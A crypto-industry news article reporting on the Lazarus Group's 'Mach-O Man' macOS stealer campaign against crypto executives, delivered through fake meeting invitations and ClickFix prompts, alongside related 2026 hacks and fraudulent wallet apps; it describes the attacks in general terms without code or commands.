Lazarus Group’s Mach-O Man Malware Targets Crypto Executives on macOS

North Korea’s Lazarus Group has deployed a new macOS malware campaign called “Mach-O Man,” using fake Zoom and Google Meet invitations to trick crypto and fintech executives into executing malicious commands on their own devices. Security researchers flagged the campaign on April 22, linking it to the same state-sponsored operation responsible for the $1.4 billion Bybit hack in 2025. The threat is modular, stealthy, and deliberately engineered to sidestep conventional endpoint defenses.

How the Mach-O Man Kit Operates

According to Mauro Eldritch, offensive security expert and founder of threat intelligence firm BCA Ltd., victims receive convincing invitations to online meetings, then encounter “ClickFix” prompts that instruct them to run terminal commands. Those commands silently download the malware in the background, bypassing standard macOS controls without triggering alerts. The final payload is a stealer module that extracts browser credentials, cookies, browser extension data, and macOS Keychain entries, before compressing everything into a zip file and exfiltrating it through Telegram. A self-deletion script then removes the entire kit using the system’s rm command, eliminating forensic traces.

Separately, blockchain security firm SlowMist flagged a related threat called “MacSync Stealer,” described as a highly destructive macOS campaign designed to drain cryptocurrency wallets and extract infrastructure credentials. Whether the two campaigns share code or operators remains unconfirmed, but their timing and targeting overlap considerably.

Market OverviewTop 10 by market cap

1Bitcoin BTC$61,930.00▲0.54%

2Ethereum ETH$1,631.00▼0.53%

3Tether USDT$0.9991▼0.01%

4BNB BNB$589.61▼0.27%

5USDC USDC$1.00▲0.02%

6XRP XRP$1.11▼2.69%

7Solana SOL$63.91▼1.37%

8TRON TRX$0.3214▼0.47%

9Figure Heloc FIGR_HELOC$1.02▼0.85%

10Dogecoin DOGE$0.0837▼1.22%

Prices via CoinGecko · Updated 3 min ago

A Broader Attack Surge Straining the Industry

Mach-O Man arrives amid what CertiK senior blockchain investigator Natalie Newson describes as a deteriorating threat environment across the entire sector. The industry has already lost over $600 million to hacks in 2026, driven largely by two DPRK-linked exploits in April: a $293 million attack on Kelp DAO exploiting a single point-of-trust failure in LayerZero’s cross-chain messaging infrastructure, and a $280 million exploit of the Drift Protocol. Newson identifies real-time deepfakes, phishing, supply chain compromises, and cross-chain vulnerabilities as the primary vectors likely to define 2026’s biggest breaches.

The hardware attack surface is expanding too. Kaspersky has identified 26 fraudulent cryptocurrency wallet applications on Apple’s App Store, active since at least fall 2025, that impersonate MetaMask, Ledger, Trust Wallet, and Coinbase to redirect users toward trojanized installs. This follows the fake Ledger app that drained $9.5 million from Apple Store users in just six days earlier this month, a signal that app store gatekeeping is not keeping pace with adversarial creativity.

What these campaigns share is architectural discipline: each one exploits human trust rather than zero-day software flaws, and each cleans up after itself. That discipline is a feature of well-resourced, state-directed operations, not opportunistic criminal groups. The infrastructure protecting this industry needs to mature at the same rate the adversaries are evolving their tradecraft, and right now, the evidence suggests it is not. That gap is the real vulnerability worth closing.